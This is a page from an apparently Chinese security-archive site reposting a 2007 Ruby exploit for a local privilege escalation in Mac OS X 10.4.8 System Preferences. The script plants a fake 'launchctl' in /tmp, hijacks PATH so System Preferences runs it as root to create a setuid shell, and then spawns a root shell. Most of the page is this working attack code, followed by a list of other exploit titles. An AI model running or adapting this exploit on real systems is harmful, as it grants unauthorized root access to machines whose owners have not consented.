Mac OS X 10.4.8 System Preferences Local Privilege Escalation Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Mac OS X 10.4.8 System Preferences Local Privilege Escalation Exploit

来源：kf_lists [at] digitalmunition.com 作者：Kevin 发布时间：2007-01-23

#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-21-01-2007: OS X, making root shells easier each day.
#

SHELL_WRAP = 'int main() { system("/bin/sh -i"); return 0; }'
SHELL_PLANT = 'int main() { system("chown root: /tmp/shX; chmod 4755 /tmp/shX"); return 0; }'
PREFS_BINPATH = '/Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences'

COMMAND_LINE = "echo '#{SHELL_WRAP}' > /tmp/t.c &&" +
"cc -o /tmp/shX /tmp/t.c &&" +
"echo '#{SHELL_PLANT}' > /tmp/t.c &&" +
"cc -o /tmp/launchctl /tmp/t.c &&" +
'export PATH="/tmp/:$PATH" &&' +
"#{PREFS_BINPATH} &"

def escalate()
system COMMAND_LINE
puts "++ Click on Sharing and then click on Windows Sharing..."
sleep 30 # make sure you have "time"
system "/tmp/shX"
end

escalate()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告